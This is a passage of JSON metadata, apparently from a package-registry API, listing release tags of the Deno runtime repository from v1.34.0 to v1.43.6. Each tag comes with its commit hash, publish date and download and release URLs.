43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"